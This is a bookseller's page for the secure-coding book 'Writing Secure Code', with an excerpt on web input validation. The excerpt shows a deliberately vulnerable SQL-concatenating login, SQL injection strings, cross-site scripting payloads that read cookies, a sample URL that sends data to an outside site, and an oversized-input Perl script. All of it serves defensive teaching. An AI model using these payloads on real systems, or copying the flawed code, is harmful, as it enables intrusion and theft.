Writing Secure Code

Keep black-hat hackers at bay with the tips and techniques in this entertaining, eye-opening book! Developers will learn how to padlock their applications throughout the entire development process—from designing secure applications to writing robust code that can withstand repeated attacks to testing applications for security flaws. Easily digested chapters reveal proven principles, strategies, and coding techniques. The authors—two battle-scarred veterans who have solved some of the industry’s toughest security problems—provide sample code in several languages. This edition includes updated information about threat modeling, designing a security process, international issues, file-system issues, adding privacy to applications, and performing security code reviews. It also includes enhanced coverage of buffer overruns, Microsoft .NET security, and Microsoft ActiveX development, plus practical checklists for developers, testers, and program managers.

Writing Secure Code

47.99 In Stock

Writing Secure Code

Add to Wishlist

Writing Secure Code

eBook

$47.99

eBook
$47.99

Available on Compatible NOOK devices, the free NOOK App and in My Digital Library.

WANT A NOOK? Explore Now

Buy As Gift

Related collections and offers

Overview

Product Details

ISBN-13:	9780735637405
Publisher:	Pearson Education
Publication date:	12/04/2002
Series:	Developer Best Practices
Sold by:	Barnes & Noble
Format:	eBook
Pages:	800
File size:	5 MB
Age Range:	18 Years

About the Author

David LeBlanc, Ph.D., is a founding member of the Trustworthy Computing Initiative at Microsoft. He has been developing solutions for computing security issues since 1992 and has created award-winning tools for assessing network security and uncovering security vulnerabilities. David is a senior developer in the Microsoft Office Trustworthy Computing group.

Read an Excerpt

12: Securing Web-Based Services

It's now time to turn our attention to what is potentially the most hostile of all environments: the Web. In this chapter, we'll focus on making sure that applications that use the Web as a transport mechanism are safe from attack. Much of this book has focused on non-Web issues; however, a good deal of the content is relevant for securing Web-based applications. For example, cryptographic mistakes and the storage of secrets—covered in Chapter 6, "Cryptographic Foibles," and Chapter 7, "Storing Secrets," respectively—as well as other aspects of this book relate to Web-based applications. But the subject definitely deserves its own chapter.

While I was researching background material in preparation for this chapter, it became obvious that one of the most common mistakes made by all vendors of Web-based servers and Web-based applications is trusting users to send well-formed, nonmalicious data. If Web-based application designers can learn to not trust user input and to be stricter about what is considered valid input, fewer Web applications will be compromised. Because of these common security issues, a large portion of this chapter focuses on Web-specific canonicalization issues and safe ways to manipulate user input. I'll also discuss other common mistakes made by Internet Server Application Programming Interface (ISAPI) application and filter developers, and then I'll wrap up with cookies issues and storing secrets in Web pages.

Never Trust User Input!

I know this injunction sounds harsh, as if people are out to get you. But many are. If you accept input from users, either directly or indirectly, it is imperative that you validate the input before using it, because people will try to make your application fail by tweaking the input to represent invalid data. The first golden rule of user input is, All input is bad until proven otherwise. Typically, the moment you forget this rule is the moment you are attacked. In this section, we'll focus on the many ways developers read input, how developers use the input, and how attackers try to trip up your application by manipulating the input.

Let me introduce you to the second golden rule of user input: Data must be validated as it crosses the boundary between untrusted and trusted environments. By definition, trusted data is data you or an entity you explicitly trust has complete control over; untrusted data refers to everything else. In short, any data submitted by a user is initially untrusted data. The reason I bring this up is many developers balk at checking input because they are positive that the data is checked by some other function that eventually calls their application, and they don't want to take the performance hit of validating the data. But what happens if the input comes from a source that is not checked, or the code you depend on is changed because it assumes some other code performs a validity check?

I once reviewed a security product that had a security flaw because a small chance existed that invalid user input would cause a buffer overrun and stop the product's Web service. The development team claimed that it could not check all the input because of potential performance problems. On closer examination, I found that not only was the application a critical network component—and hence the potential damage from an exploit was immense—but also it performed many time-intensive and CPU-intensive operations, including public-key encryption, heavy disk I/O, and authentication. I doubted much that a half dozen lines of input-checking code would lead to a performance problem. As it turned out, the code did indeed cause no performance problems, and the code was rectified.

Hopefully, by now, you understand that all input is suspicious until proven otherwise, and your application should validate direct user input before it uses it. Let's look at some strategies for handling hostile input.

User Input Vulnerabilities

Virtually all Web applications perform some action based on user requests. Let's be honest: a Web-based service that doesn't take user input is probably worthless! Remember that you should determine what is valid data and reject all other input. Let's look at an example, which is based on some Active Server Pages (ASP) code from a Web site that recommended Web site designers use the following JScript code in their ASP-based applications to implement forms-based authentication:

// Get the username and password from the form.
if (isValidUserAndPwd(Request.form("name"),
                      Request.form("pwd"))) {
    Response.write("Authenticated!");   
} else {
    Response.write("Access Denied"); 
}

function isValidUserAndPwd(strName, strPwd) {
    var fValid = false; 
    var oConn = new ActiveXObject("ADODB.Connection"); 
    oConn.Open("Data Source=c:\\auth\\auth.mdb;");
   
    var strSQL = "SELECT count(*) FROM client WHERE " +  
        "name=‘" + strName + "‘ " + 
        " and pwd=‘" + strPwd + "‘"; 
    var oRS = new ActiveXObject("ADODB.RecordSet");
    oRS.Open(strSQL, oConn);
    fValid = (oRS(0).Value > 0) ? true : false;

    oRS.Close(); 
    delete oRS;
    oConn.Close();
    delete oConn; 

    return fValid;
}

Below is the client code used to send the username and password to the JScript code by using an HTTP POST:

<FORM ACTION="Logon.asp" METHOD=POST>
    <INPUT TYPE=text MAXLENGTH=32 NAME=name>
    <INPUT TYPE=password MAXLENGTH=32 NAME=pwd>
    <INPUT TYPE=submit NAME=submit VALUE="Logon">
</FORM>

An explanation of this code is in order. The user enters a username and a password by using the HTML form shown above and then clicks the Logon button. The ASP code takes the username and password from the form and builds a SQL statement based on the user's data to query a database. If the number of rows returned by the query is greater than zero—SELECT count(*) returns the number of rows returned by the SQL query—the username and password combination are valid and the user is allowed to log on to the system.

Both the client and server code are hopelessly flawed, however, because the solution takes direct user input and uses it to access a database without checking whether the input is valid. In other words, data is transferred from an untrusted source—a user—to a trusted source, the SQL database under application control.

Let's assume a nonmalicious user enters his name, Blake, and password $qu1r+, which builds the following SQL statement:

SELECT count(*) FROM client 
WHERE name=‘Blake' 
AND pwd=‘$qu1r+'

If this is a valid username and password combination, count(*) returns a value of at least 1 and allows the user access to the system. The query could potentially return more than 1 if two users exist with the same username and password or if an administrative error leads to the data being entered twice.

Now let's turn our attention to what a bad guy might do to compromise the system. Because the username and password are unchecked by the ASP application, the attacker can send any input. We'll look at this as a series of mistakes and then determine how to remedy the errors.

Mistake #1: Trusting the User

You should never trust user input directly, especially if the user input is anonymous. Remember the two golden rules: never trust user input, and always check data as it moves from an untrusted to a trusted domain.

A malicious user input scenario to be wary of is that of your application taking user input and using the input to create output for other users. For example, consider the security ramifications if you build a Web service that allows users to create and post product reviews for other users of the system to read prior to making a product purchase. Imagine that an attacker does not like Product_A but likes Product_B. The attacker creates a comment about Product_A, which will appear on the Product_A Web page, along with all the other reviews. However, the comment is this:

<meta http-equiv="refresh"
    content="2;URL=http://www.northwindtraders.com/productb.aspx">

This HTML code will send the user's browser to the product page for Product_B after the browser has spent two seconds at the page for Product_A!

Cross-site scripting Another variation of this attack is the cross-site scripting attack. Once again, trust of user input is at fault, but in this case an attacker sends a link in e-mail to a user or otherwise points the user to a link to a Web site, and a malicious payload is in the query string embedded in the URL. The attack is particularly bad if the Web site creates an error message with the embedded query string as part of the error text.

Let's look at a fictitious example. A Web service allows you to view remote documents by including the document name in the query string. For example,

http://servername/view.asp?file=filename

An attacker sends the following URL in e-mail—probably by using SMTP spoofing to disguise the attacker's identity—to an unsuspecting victim:

http://servername/view.asp?file= <script>x=document.cookie;alert
("Cookie%20"%20%2b%20x);</script>

Note the use of %nn characters; these are hexadecimal escape sequences for ASCII characters and are explained later in this chapter. For the moment, all you need to know is %20 is a space, and %2b is a plus (+) symbol. The reason for using the escapes is to remove any spaces and certain special characters from the query string so that it's correctly parsed by the server.

When the victim clicks the URL, the Web server attempts to access the file in the query string, which is not a file at all but JScript code. The server can't find the file, so it sends an error to the user to that effect. However, it also includes the name of the "file" that could not be found in the error message. The script that makes up the filename is then executed by the user's browser. You can do some serious damage with small amounts of JScript!

With cross-site scripting, cookies can be read; browser plug-ins or native code can be instantiated and scripted with untrusted data; and user input can be intercepted. Any Web browser supporting scripting is potentially vulnerable, as is any Web server that supports HTML forms. Furthermore, data gathered by the malicious script can be sent back to the attacker's Web site. For example, if the script has used the Dynamic HTML (DHTML) object model to extract data from a page, it can send the data to the attacker by fetching a URL of the form http://www.northwindtraders.com/CollectData.html?data=SSN123-45-6789.

This attack can be used against machines behind firewalls. Many corporate local area networks (LANs) are configured such that client machines trust servers on the LAN but do not trust servers on the outside Internet. However, a server outside a firewall can fool a client inside the firewall into believing a trusted server inside the firewall has asked the client to execute a program. All the attacker needs is the name of a Web server inside the firewall that doesn't check fields in forms for special characters. This isn't trivial to determine unless the attacker has inside knowledge, but it is possible.

Many cross-site scripting bugs were found in many products during 2000, which led to the CERT^® Coordination Center at Carnegie Mellon University issuing a security advisory entitled "Malicious HTML Tags Embedded in Client Web Requests," warning developers of the risks of cross-site scripting. You can find out more at www.cert.org/advisories/CA-2000-02.html. A wonderful explanation of the issues is also available in "Cross-Site Scripting Overview" at www.microsoft.com/ technet/itsolutions/security/topics/csoverv.asp.

Mistake #2: Unbounded Sizes

If the size of the client data is unbounded and unchecked, an attacker can send as much data as she wants. This could be a security issue if there exists an as-yet- unknown buffer overrun in the database code called when invoking the SQL query. On closer examination, an attacker can easily bypass the maximum username and password size restrictions imposed by the previous client HTML form code, which restricts both fields to 32 characters, simply by not using the client code. Instead, attackers write their own client code in, say, Perl, or just use a Telnet client. The following is such an example, which sends a valid HTML form to Logon.asp but sets the password and username to be 32,000 letter As.

use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;

$ua = LWP::UserAgent->new();
$req = POST ‘http://www.northwindtraders.com/ Logon.asp',
         [ pwd => ‘A' x 32000,
           name => ‘A' x 32000,
         ];
$res = $ua->request($req);

Do not rely on client-side HTML security checks—in this case, by thinking that the username and password lengths are restricted to 32 characters—because an attacker can always bypass such controls by bypassing the client altogether.

Mistake #3: Using Direct User Input in SQL Statements

This scenario is a little more insidious. Because the input is untrusted and has not been checked for validity, an attacker could change the semantics of the SQL statement. In the following example, the attacker enters a completely invalid name and password, both of which are b' or '1' = '1, which builds the following valid SQL statement:

SELECT count(*)
FROM client 
WHERE name=‘b' or ‘1'=‘1' and pwd=‘b' or ‘1'=‘1'

Look closely and you'll see that this statement will always return a row count value of greater than one, because the '1' = '1' fragment is true on both sides of the and clause. The attacker is authenticated without knowing a valid username or password—he simply entered some input that changed the way the SQL query works.

Here's another variation: if the attacker knows a username and wants to spoof that user account, he can do this using SQL comments—for example, two hyphens (- -) in Microsoft SQL Server or the hash sign (#) in mySQL. Some other databases use the semicolon (;) as the comment symbol. Rather than entering b' or '1' = '1, the attacker enters Cheryl' --, which builds up the following legal SQL statement:

SELECT count(*)
FROM client    
WHERE name=‘Cheryl' --and pwd=‘‘

If a user named Cheryl is defined in the system, the attacker can log in because he has commented out the rest of the SQL statement, which evaluates the password, so that the password is not checked!

The types of attacks open to an assailant don't stop there—allow me to show you one more scenario, and then I'll focus on solutions for the issues we've examined.

SQL statements can be joined. For example, the following SQL is valid:

SELECT * from client INSERT into client VALUES (‘me', ‘ URHacked')

This single line is actually two SQL statements. The first selects all rows from the client table, and the second inserts a new row into the same table.

An attacker could use this login ASP page and enter a username of b' INSERT INTO client VALUES ('me', 'URHacked') --, which would build the following SQL:

SELECT count(*)
FROM client    
WHERE name=‘b' INSERT INTO client VALUES (‘me', ‘URHack ed') --and pwd=‘‘

Once again, the password is not checked, because that part of the query is commented out. Worse, the attacker has added a new row containing me as a username and URHacked as the password—now the attacker can log in using me and URHacked!

Enough bad news—let's look at remedies!

User Input Remedies

As with all user input issues, the first rule is to determine which input is valid and to reject all other input. (Have I said that enough times?) Other not-so-paranoid options exist and offer more functionality with potentially less security. I'll discuss some of these also.

A Simple and Safe Approach: Be Hardcore About Valid Input

In the cases of the Web-based form and SQL examples earlier, the valid characters for a username can be easily restricted to a small set of valid characters, such as A-Za-z0-9. The following server-side JScript snippet shows how to construct and use a regular expression to parse the username at the server:

// Determine whether username is valid.
// Valid format is 1 to 32 alphanumeric characters. 
var reg = /^[A-Za-z0-9]{1,32}$/g;
if (reg.test(Request.form("name")) > 0) {
    // Cool! Username is valid.
} else {
    // Not cool! Username is invalid.
}

Not only does this regular expression restrict the username to a small subset of characters, but also it makes sure the string is between 1 and 32 characters long. If you make decisions about user input in COM components written in Microsoft Visual Basic or C++, you should read Chapter 8, "Canonical Representation Issues," to learn how to perform regular expressions in other languages.

Your code should apply a regular expression to all input, whether it is part of a form, an HTTP header, or a query string.

In the case of the filename passed to the Web server as a query string, the following regular expression, which represents a valid filename—note that this does not allow for directories or drive letters!—would stamp out any attempt to use script as part of the query string:

// Determine whether filename is valid.
// Valid format is 1 to 24 alphanumeric characters 
// followed by a period, and 1 to 3 alpha characters.
var reg = /^[A-Za-z0-9]{1,24}\.[A-Za-z]{1,3}$/g;
if (reg.test(Request.Querystring("file")) > 0) {
    // Cool! Valid filename.
} else {
    // Not cool! Invalid filename.
}

Not being strict is dangerous A common mistake made by many Web developers is to allow "safe" HTML constructs—for example, allowing a user to send <IMG> or <TABLE> tags to the Web application. Then the user can send HTML tags but nothing else, other than plaintext. Do not do this. A cross-site scripting danger still exists because the attacker can embed script in some of these tags. Here are some examples:

<img src=javascript:alert(document.domain)>

<link rel=stylesheet href="javascript:alert(document.domain)">

<input type=image src=javascript:alert(document.domain)>

<bgsound src=javascript:alert(document.domain)>

<iframe src="javascript:alert(document.domain)">

<frameset onload=vbscript:msgbox(document.cookie)></frameset>

<table background="javascript:alert(document.domain)"></table>

<object type=text/html data="javascript:alert(document.domain);"></object>

<body onload="javascript:alert(document.cookie)"></body>

<body background="javascript:alert(document.cookie)"></body>

<p style=left:expression(alert(document.cookie))>

Let's say you want to allow a small subset of HTML tags so that your users can add some formatting to their comments. Allowing tags like <I>…</I> and <B>…</B> is safe, so long as the regular expression looks for these character sequences explicitly. The following regular expression will allow these tags, as well as other safe characters:

var reg = /^(?:[\s\w\?\.\,\!\$]+|(?:\<\/?[ib]\>))+$/gi;
if (reg.test(strText) > 0) {
    // Cool! Valid input.
} else {
    // Not cool! Invalid input.
}

This regular expression will allow spaces (\s), A-Za-z0-9 and ‘_' (\w), a limited subset of punctuation and < followed by an optional /, and the letter i or b followed by a >. The i at the end of the expression makes the check case-insensitive. Note that this regular expression does not validate the input is well-formed HTML. For example, Hello, </i>World!<i> is legal input to the regular expression, but it is not well-formed HTML even though the tags are not malicious.

So you think you're safe? Another mistake I've seen involves converting all input to uppercase to thwart JScript attacks, because JScript is primarily lowercase and case-sensitive. And what if the attacker uses Visual Basic Scripting Edition (VBScript), which is case- insensitive, instead? Don't think that stripping single or double quotes will help either—many script and HTML constructs take arguments without quotes.

In summary, you should be strict about what is valid user input, and make sure the regular expression does not allow HTML in the input, especially if the input might become output for other users.

Special Care of Passwords

You could potentially use regular expressions to restrict passwords to a limited subset of valid characters. But doing so is problematic because you need to allow complex passwords, which means allowing many nonalphanumeric characters. A naive approach is to use the same regular expression defined earlier but restrict the valid character list to A-Za-z0-9 and a series of punctuation characters you know are safe. This requires you understand all the special characters used by your database or used by the shell if you're passing the data to another process. Even worse, you might disallow certain characters, such as the | character, but allow the % character and numerals, in which case the attacker can escape the | character by using a hexadecimal escape, %7c, which is a valid series of characters in the regular expression.

One way of handling passwords is not to use the password directly; instead, you could base64-encode or hash the password prior to passing the password to the query. The former is reversible, which means that if the Web application requires the plaintext password for some other task, it can un-base64 the password held in the database. However, if you do not need to use the password other than to authenticate the incoming client authentication attempt, you can simply hash the password and compare the hash stored in the database. The positive side effect of this approach is that the attacker has access only to the password hash and not to the password itself if the authentication database is compromised. Refer to Chapter 7 for more information about this process.

The preferred approach is to use the Web server's capabilities to encode the password. In the case of ASP, you can use the Server.URLEncode method to encode the password, and you can use HttpServerUtility.URLEncode in ASP.NET. URLEncode applies various rules to convert nonalphanumeric characters to hexadecimal equivalents. For example, the password ' 2Z.81h\/^-$%' becomes %272Z%2E81h%5C%2F%5E%2D%24%25. The password has the same effective strength in both cases—you incur no password entropy loss when performing the encoding operation.

What's really cool about URLEncode is that it caters to UTF-8 characters also, so long as the Web page can process UTF-8 characters. For example, the following nonsense French phrase—"Général à la François"—becomes G%C3%A9n%C3%A9ral+%C3%A0+la+Fran%C3%A7ois. You can force an ASP page to use UTF-8 data by setting Session.Codepage=65001 at the start of the ASP page or by using the HttpSessionState.CodePage property in ASP.NET.

Do not give up if your application does not have access to the CodePage property or the URLEncode method. You have five options. The first is to use the UrlEscape function exported by Shlwapi.dll. The second is to use CoInternetParseUrl exported by Urlmon.dll. The third is to use InternetCanonicalizeUrl exported by Wininet.dll. You can also use the ATL Server CUrl::Canonicalize method defined in Atlutil.h. If your application uses JScript, you can use the escape and unescape functions to encode and decode the string.

Note that UrlEscape and CoInternetParseUrl should be called from client applications only, and it's recommended that you check each function or method before using it to verify it has the appropriate options and capabilities for your application....

Foreword
Acknowledgments
Introduction
Part I: Contemporary Security: 1: The Need for Secure Systems; 2: Designing Secure Systems
Part II: Secure Coding Techniques: 3: Public Enemy #1: The Buffer Overrun; 4: Determining Good Access Control; 5: Running with Least Privilege; 6: Cryptographic Foibles; 7: Storing Secrets; 8: Canonical Representation Issues
Part III: Network-Based Application Considerations: 9: Socket Security; 10: Securing RPC, ActiveX Controls, and DCOM; 11: Protecting Against Denial of Service Attacks; 12: Securing Web-Based Services
Part IV: Special Topics: 13: Writing Secure .NET Code; 14: Testing Secure Applications; 15: Secure Software Installation; 16: General Good Practices
Part V: Appendixes: A: Dangerous APIs; B: The Ten Immutable Laws of Security; C: The Ten Immutable Laws of Security Administration; D: Lame Excuses We've Heard
A Final Thought
Annotated Bibliography
Index

From the B&N Reads Blog

Page 1 of

Editorial Reviews

The Barnes & Noble Review
Your code will be attacked. You need to assume it will run in the most hostile environments imaginable -- and design, code, and test accordingly. Writing Secure Code, Second Edition shows you how.
This edition draws on the lessons learned and taught throughout Microsoft during the firm’s massive 2002 “Windows Security Push.” It’s a huge upgrade to the respected First Edition, with new coverage across the board.
Michael Howard and David LeBlanc first help you define what security means to your customers -- and implement a three-pronged strategy for securing design, defaults, and deployment. There’s especially useful coverage of threat modeling -- decomposing your application, identifying threats, ranking them, and mitigating them.
Then, it’s on to in-depth coverage of today’s key security issues from the developer’s standpoint. Everyone knows buffer overruns are bad: Here’s a full chapter on avoiding them. You’ll learn how to establish appropriate access controls and default to running with least privilege. There’s detailed coverage of overcoming attacks on cryptography (for example, avoiding poor random numbers and bit-flipping attacks). You’ll learn countermeasures for virtually every form of user input attack, from malicious database updates to cross-site scripting.
We’ve just scratched the surface: There are authoritative techniques for securing sockets and RPC, protecting against DOS attacks, building safer .NET applications, reviewing and testing code, adding privacy features, and even writing high-quality security documentation. Following these techniques won’t just improve security -- it’ll dramatically improve robustness and reliability, too. Bill Camarda
Bill Camarda is a consultant, writer, and web/multimedia content developer. His 15 books include Special Edition Using Word 2000 and Upgrading & Fixing Networks For Dummies®, Second Edition.

Writing Secure Code

Writing Secure Code

eBook

eBook

Related collections and offers

Overview

Product Details

About the Author

Read an Excerpt

12: Securing Web-Based Services

Never Trust User Input!

User Input Vulnerabilities

User Input Remedies

Table of Contents

Customer Reviews

Related collections and offers

Overview

Product Details

About the Author

Read an Excerpt

12: Securing Web-Based Services

Never Trust User Input!

User Input Vulnerabilities

User Input Remedies

Table of Contents

Related Subjects

Customer Reviews